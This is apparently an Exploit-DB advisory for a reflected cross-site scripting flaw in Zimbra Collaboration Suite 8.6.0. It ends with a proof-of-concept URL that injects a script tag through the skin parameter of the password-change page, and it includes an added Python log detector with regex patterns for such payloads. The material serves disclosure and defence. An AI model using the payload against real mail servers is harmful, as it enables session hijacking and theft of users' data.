Vendor: Zimbra Collaboration Suite
By: Dinbar78
CVSS: 6.1 (MEDIUM)
Type: XSS
CWE: 79
Product Name: Zimbra Collaboration Suite
Affected Version From: 8.6.0_GA_1153 (build 20141215151110)
Affected Version To: 8.6.0_GA_1153 (build 20141215151110)
Patch Exists: YES
Related CWE: CVE-2016-3411
CPE: a:zimbra:zimbra_collaboration_suite
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
Year: 2018

Xss Zimbra Mail server

A cross-site scripting vulnerability in the Zimbra Mail server allows an attacker to inject JavaScript into the application by sending a specially crafted URL. The URL carries a malicious payload that is executed in the user's browser when the user visits the page, and that payload can run arbitrary JavaScript, which can be used to steal user data or perform other malicious actions.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update the application to the latest version.
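As an added defensive example (not part of this advisory or of Zimbra's code), the following Python detector scans web-server access-log lines for requests to the /h/changepass endpoint whose skin parameter carries markup, decoding the value repeatedly so double-encoded variants are also caught. The log lines, client IPs and function names are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample access-log lines (combined log format). The second line
# carries the URL-encoded form of the payload shown in the advisory; the third
# is a double-encoded variant that single decoding would miss.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Aug/2018:12:00:01 +0000] "GET /h/changepass?skin=harmony HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Aug/2018:12:00:02 +0000] "GET /h/changepass?skin=%22%3E%3Cscript%3Ealert%28%27hacked%27%29%3B%3C%2Fscript%3E HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Aug/2018:12:00:03 +0000] "GET /h/changepass?skin=%2522%253E%253Cscript%253E HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""

# client IP and request target from a combined-format line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
# a legitimate skin name is a plain identifier; any markup or handler is suspicious
SUSPICIOUS = re.compile(r'[<>"\']|script|javascript:|on\w+=', re.IGNORECASE)


def decode_fully(value, rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded payloads are not missed."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def skin_values(request_target):
    """Return the skin parameter values of a request to /h/changepass, else []."""
    parts = urlsplit(request_target)
    if parts.path != "/h/changepass":
        return []
    return parse_qs(parts.query, keep_blank_values=True).get("skin", [])


def find_xss_attempts(log_text):
    """Return (client_ip, decoded skin value) for each request whose skin value carries markup."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client_ip, target = match.groups()
        for raw_value in skin_values(target):
            value = decode_fully(raw_value)
            if SUSPICIOUS.search(value):
                hits.append((client_ip, value))
    return hits


if __name__ == "__main__":
    for ip, value in find_xss_attempts(SAMPLE_LOG):
        print(f"{ip} -> skin={value!r}")
```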

Exploit-DB raw data:

# Exploit Title: Xss Zimbra Mail server
# Google Dork:
# Date: 2018/08/10
# Exploit Author: Dinbar78
# Vendor Homepage: https://www.zimbra.com/

# Version: 8.6.0_GA_1153 (build 20141215151110)
# bug 103609 or CVE-2016-3411


Payload: es.
https:// (zimbrasite)/h/changepass?skin="><script>alert('hacked');</script>